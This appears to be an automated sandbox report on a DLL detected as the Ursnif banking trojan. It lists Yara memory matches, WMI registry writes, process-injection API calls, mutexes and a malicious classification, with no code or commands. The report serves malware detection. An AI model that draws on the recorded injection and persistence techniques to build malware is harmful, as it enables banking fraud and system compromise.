Source: Yara match File source: 00000000.00000003.370648596.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.454676310.0000018F0052C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000002.524027105.0000018F0052C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348321035.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370736273.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.454577691.0000018F0052C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370774075.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348246192.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.354947926.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370705290.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.357289358.0000000004E8C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.379171921.0000000003CBC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.409791915.0000000005858000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348360798.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348388126.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.352157676.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.377531681.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348375110.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348299510.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370678028.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.454500473.0000018F0052C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348273789.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.454723611.0000018F0052C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370795651.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370752260.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 4156, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5928, type: MEMORYSTR

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.348342609.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.373389445.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370586120.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.435306000.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370648596.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.454676310.0000018F0052C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000002.524027105.0000018F0052C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348321035.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370736273.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.454577691.0000018F0052C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370774075.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348246192.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.354947926.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370705290.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.357289358.0000000004E8C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.379171921.0000000003CBC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.409791915.0000000005858000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348360798.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348388126.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.352157676.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.377531681.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348375110.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348299510.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370678028.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.454500473.0000018F0052C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348273789.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.454723611.0000018F0052C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370795651.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370752260.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 4156, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5928, type: MEMORYSTR

System Summary:

barindex
Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E23192C NtMapViewOfSection, 0_2_6E23192C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E231E74 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 0_2_6E231E74
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E2312CE GetProcAddress,NtCreateSection,memset, 0_2_6E2312CE
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E232495 NtQueryVirtualMemory, 0_2_6E232495
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04843C5B NtCreateSection,memset, 0_2_04843C5B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_048625B9 memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset, 0_2_048625B9
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04854D10 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 0_2_04854D10
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0485A680 NtMapViewOfSection, 0_2_0485A680
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04844F72 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 0_2_04844F72
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_048468EE NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 0_2_048468EE
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_048551A4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 0_2_048551A4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0485790F NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_0485790F
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04860A00 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 0_2_04860A00
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04856A33 NtQueryInformationProcess, 0_2_04856A33
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_048633A6 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 0_2_048633A6
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0484CBA7 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_0484CBA7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0484349A memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 0_2_0484349A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0485AD9A NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_0485AD9A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0485E543 NtGetContextThread,RtlNtStatusToDosError, 0_2_0485E543
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_048509C7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 0_2_048509C7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04848936 memset,NtQueryInformationProcess, 0_2_04848936
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0484C240 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 0_2_0484C240
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_048603BD NtQuerySystemInformation,RtlNtStatusToDosError, 0_2_048603BD
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0486133A NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 0_2_0486133A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053D4D10 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 3_2_053D4D10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053C4F72 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 3_2_053C4F72
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053D51A4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 3_2_053D51A4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053C68EE NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 3_2_053C68EE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053E33A6 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 3_2_053E33A6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053D6A33 NtQueryInformationProcess, 3_2_053D6A33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053E0A00 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 3_2_053E0A00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053DE543 NtGetContextThread,RtlNtStatusToDosError, 3_2_053DE543
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053DAD9A NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 3_2_053DAD9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053C349A memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 3_2_053C349A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053C8936 memset,NtQueryInformationProcess, 3_2_053C8936
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053D790F NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 3_2_053D790F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053D09C7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 3_2_053D09C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053E133A NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 3_2_053E133A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053E03BD NtQuerySystemInformation,RtlNtStatusToDosError, 3_2_053E03BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053CCBA7 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 3_2_053CCBA7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053CC240 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 3_2_053CC240
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_063F25E5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 5_2_063F25E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_063F8055 NtQueryVirtualMemory, 5_2_063F8055
Source: C:\Windows\System32\control.exe Code function: 42_2_00F179DC NtQueryInformationToken,NtQueryInformationToken,NtClose, 42_2_00F179DC
Source: C:\Windows\System32\control.exe Code function: 42_2_00EFC29C NtQueryInformationProcess, 42_2_00EFC29C
Source: C:\Windows\System32\control.exe Code function: 42_2_00F066D4 NtSetInformationProcess,CreateRemoteThread, 42_2_00F066D4
Source: C:\Windows\System32\control.exe Code function: 42_2_00F2F002 NtProtectVirtualMemory,NtProtectVirtualMemory, 42_2_00F2F002
Contains functionality to launch a process as a different user
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0485A606 CreateProcessAsUserA, 0_2_0485A606
Detected potential crypto function
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E232274 0_2_6E232274
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0485F4BE 0_2_0485F4BE
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04861CD6 0_2_04861CD6
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0485ED58 0_2_0485ED58
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0485DE9A 0_2_0485DE9A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04850F82 0_2_04850F82
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04842F9C 0_2_04842F9C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_048498A0 0_2_048498A0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0484D8E5 0_2_0484D8E5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0484B2A4 0_2_0484B2A4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_048652A0 0_2_048652A0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0484EAFA 0_2_0484EAFA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053DED58 3_2_053DED58
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053DF4BE 3_2_053DF4BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053E1CD6 3_2_053E1CD6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053C2F9C 3_2_053C2F9C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053D0F82 3_2_053D0F82
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053DDE9A 3_2_053DDE9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053C98A0 3_2_053C98A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053CD8E5 3_2_053CD8E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053CB2A4 3_2_053CB2A4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053E52A0 3_2_053E52A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053CEAFA 3_2_053CEAFA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_063F7E30 5_2_063F7E30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_063F6680 5_2_063F6680
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_063F175B 5_2_063F175B
Source: C:\Windows\System32\control.exe Code function: 42_2_00F0D958 42_2_00F0D958
Source: C:\Windows\System32\control.exe Code function: 42_2_00F1832C 42_2_00F1832C
Source: C:\Windows\System32\control.exe Code function: 42_2_00EF30FC 42_2_00EF30FC
Source: C:\Windows\System32\control.exe Code function: 42_2_00EF90FC 42_2_00EF90FC
Source: C:\Windows\System32\control.exe Code function: 42_2_00EFA8C4 42_2_00EFA8C4
Source: C:\Windows\System32\control.exe Code function: 42_2_00F058DC 42_2_00F058DC
Source: C:\Windows\System32\control.exe Code function: 42_2_00EF5080 42_2_00EF5080
Source: C:\Windows\System32\control.exe Code function: 42_2_00F13858 42_2_00F13858
Source: C:\Windows\System32\control.exe Code function: 42_2_00EF5814 42_2_00EF5814
Source: C:\Windows\System32\control.exe Code function: 42_2_00F069AC 42_2_00F069AC
Source: C:\Windows\System32\control.exe Code function: 42_2_00F15110 42_2_00F15110
Source: C:\Windows\System32\control.exe Code function: 42_2_00F1CAF4 42_2_00F1CAF4
Source: C:\Windows\System32\control.exe Code function: 42_2_00F1A280 42_2_00F1A280
Source: C:\Windows\System32\control.exe Code function: 42_2_00F16268 42_2_00F16268
Source: C:\Windows\System32\control.exe Code function: 42_2_00EF624C 42_2_00EF624C
Source: C:\Windows\System32\control.exe Code function: 42_2_00F0625C 42_2_00F0625C
Source: C:\Windows\System32\control.exe Code function: 42_2_00EF8254 42_2_00EF8254
Source: C:\Windows\System32\control.exe Code function: 42_2_00F16A38 42_2_00F16A38
Source: C:\Windows\System32\control.exe Code function: 42_2_00F05210 42_2_00F05210
Source: C:\Windows\System32\control.exe Code function: 42_2_00F03BE0 42_2_00F03BE0
Source: C:\Windows\System32\control.exe Code function: 42_2_00EFC3B4 42_2_00EFC3B4
Source: C:\Windows\System32\control.exe Code function: 42_2_00EFBB94 42_2_00EFBB94
Source: C:\Windows\System32\control.exe Code function: 42_2_00F13B8E 42_2_00F13B8E
Source: C:\Windows\System32\control.exe Code function: 42_2_00F1BB54 42_2_00F1BB54
Source: C:\Windows\System32\control.exe Code function: 42_2_00EF3B24 42_2_00EF3B24
Source: C:\Windows\System32\control.exe Code function: 42_2_00EF9CD0 42_2_00EF9CD0
Source: C:\Windows\System32\control.exe Code function: 42_2_00F1A470 42_2_00F1A470
Source: C:\Windows\System32\control.exe Code function: 42_2_00EF1C78 42_2_00EF1C78
Source: C:\Windows\System32\control.exe Code function: 42_2_00F05C24 42_2_00F05C24
Source: C:\Windows\System32\control.exe Code function: 42_2_00EF25E8 42_2_00EF25E8
Source: C:\Windows\System32\control.exe Code function: 42_2_00F075F8 42_2_00F075F8
Source: C:\Windows\System32\control.exe Code function: 42_2_00F0F598 42_2_00F0F598
Source: C:\Windows\System32\control.exe Code function: 42_2_00EFED6C 42_2_00EFED6C
Source: C:\Windows\System32\control.exe Code function: 42_2_00F0CD6C 42_2_00F0CD6C
Source: C:\Windows\System32\control.exe Code function: 42_2_00EF7D48 42_2_00EF7D48
Source: C:\Windows\System32\control.exe Code function: 42_2_00F10D44 42_2_00F10D44
Source: C:\Windows\System32\control.exe Code function: 42_2_00F17524 42_2_00F17524
Source: C:\Windows\System32\control.exe Code function: 42_2_00F00EF4 42_2_00F00EF4
Source: C:\Windows\System32\control.exe Code function: 42_2_00EFFEE4 42_2_00EFFEE4
Source: C:\Windows\System32\control.exe Code function: 42_2_00F1A6C8 42_2_00F1A6C8
Source: C:\Windows\System32\control.exe Code function: 42_2_00F16E34 42_2_00F16E34
Source: C:\Windows\System32\control.exe Code function: 42_2_00F15E3C 42_2_00F15E3C
Source: C:\Windows\System32\control.exe Code function: 42_2_00F0EF74 42_2_00F0EF74
Source: C:\Windows\System32\control.exe Code function: 42_2_00F07F68 42_2_00F07F68
Source: C:\Windows\System32\control.exe Code function: 42_2_00EF4744 42_2_00EF4744
Source: C:\Windows\System32\control.exe Code function: 42_2_00F0AF34 42_2_00F0AF34
PE file does not import any functions
Source: tangn2aw.dll.27.dr Static PE information: No import functions for PE file found
Source: 4mppu3lx.dll.34.dr Static PE information: No import functions for PE file found
Source: kdz1kgtq.dll.23.dr Static PE information: No import functions for PE file found
Source: y3j0hr41.dll.39.dr Static PE information: No import functions for PE file found
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Uses 32bit PE files
Source: beneficial.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: classification engine Classification label: mal100.troj.evad.winDLL@42/36@9/1
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0485D325 CloseHandle,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle, 0_2_0485D325
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20210730 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{7E32BD42-C5B7-60C6-3F92-C994E3E60D08}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{E235F4DB-D9BB-64F3-7336-1DD857CAA18C}
Source: C:\Windows\System32\loaddll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{92A77881-C9A1-9440-E3E6-0D08C77A91BC}
Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{8E094731-9503-F07F-8FA2-992433F6DD98}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5300:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5488:120:WilError_01
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{92CEAACD-C99C-94FF-E3E6-0D08C77A91BC}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5usb1drh.jow.ps1 Jump to behavior
Source: beneficial.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
